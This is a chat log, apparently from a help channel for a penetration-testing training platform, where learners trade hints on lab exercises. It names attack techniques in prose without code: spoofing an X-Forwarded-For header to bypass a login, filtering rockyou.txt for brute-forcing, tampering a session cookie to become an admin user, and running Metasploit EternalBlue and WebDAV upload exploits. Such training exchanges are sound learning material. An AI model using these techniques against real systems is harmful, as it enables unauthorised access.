Hi someone have done BUG BOUNTY HUNTING PROCESS? I have big problem with question o.O I appreciate the help
what question do you need help?
Attacking Common Services/Attacking FTP.
I can't see any port with FTP service on.
Is there a problem with the module or am I missing something?
I think you need to reset the server
I had to try several of the extensions before I found one that actually worked. DM me if you wanna chat further
I already did...both the pwnbox AND the target machine....
try scan all ports first
i think the FTP wasn't on the default port
Hi, in using the metasploit framework in ** meterpreter** when i use this exploit with MSF iis_webdav_upload_asp i have an error like this one Upload failed on /metasploit399594.txt [404 Not Found]
I already did this too...I know it's not on the default ports...But I can't see it..
that's weird
let me give it a try
Okay, please let me know if you find out what's "wrong"
Has anyone been having issues going to full screen mode within the module instances after updating to Monterey or am I all alone here?
Okay, I think it's fixed(?). Took me long too now, but now I see it.
ah ok, then i can go sleep now
lolol
Have fun!
lmk if you manage to finish the DNS part
hahaha thanks byee
Im stuck at the DNS
No one?
@split fable were you able to get logged in as support.xx?
@remote solar try running a find command to see what files are part of the adm group. The flag is hidden in a log file
@rustic sage Yes, the python script to bruteforce never works. Try using either burpsuite or Curl to add the X-Forwarded-For header along with a trusted IP address --- this should allow us to use ANY credentials and still get the flag
i managed to tamper the session cookie (not the persistent one) and with burp i can view the login page of support.xx but when i follow the redirection it says "user cannot have the requested role"
With which module?
@split fable right, so we actually need to log in as support.xx. So you will need to filter the rockyou.txt wordlist for words matching the password complexity requirements. Then once you're logged in as the support user, you can tamper the cookie to switch to the admin.xx user.
i'm currently doing the "using web proxies" module, and am now doing the "Repeating requests" question. it wants me to find a flag on a site, by using repeating requests. i've been searching for quite a while now and i think i've got the hang of how to look for things, but i can't find the flag. any hints on where the file is located?
@hexed kestrel try checking the root directory. ls /
yea i just thought of that, had not checked it yet, ty :)
i spent like half an hour looking around in the /var directory lol
Hi everyone, I want to access the htb-academy target machine from my linux system using SSH, but it's not connecting, no error, just Time out. anyone else facing same issue.
@rustic sage sorry if this is a silly question, but are you connected to the VPN?
yep
which module/section? I can test it on my end
web requests
I don't think there's any section that involves SSH
can i dm you
sure
Hey everyone, I'm running a windows/smb exploit, having identified the relevant services, exploit & payload to exploit. Having ran the check command in msf, which confirms the vulnerability & setting the rhost to my target. The exploit gets completed but no session is created, tried a different related payload & still no session. I'm aware there's a lot of other exploits I can test. However, rather than fire off other exploits I'd like to first understand & explore why the session didn't create & what I'm missing.
Any ideas/suggestions would be greatly appreciated. Thanks

@coral tree which module/section is that from?
@west canopy its the eternalblue & psexec module: windows/smb/ms17. Targeting the 445 port
is that the Metasploit module?
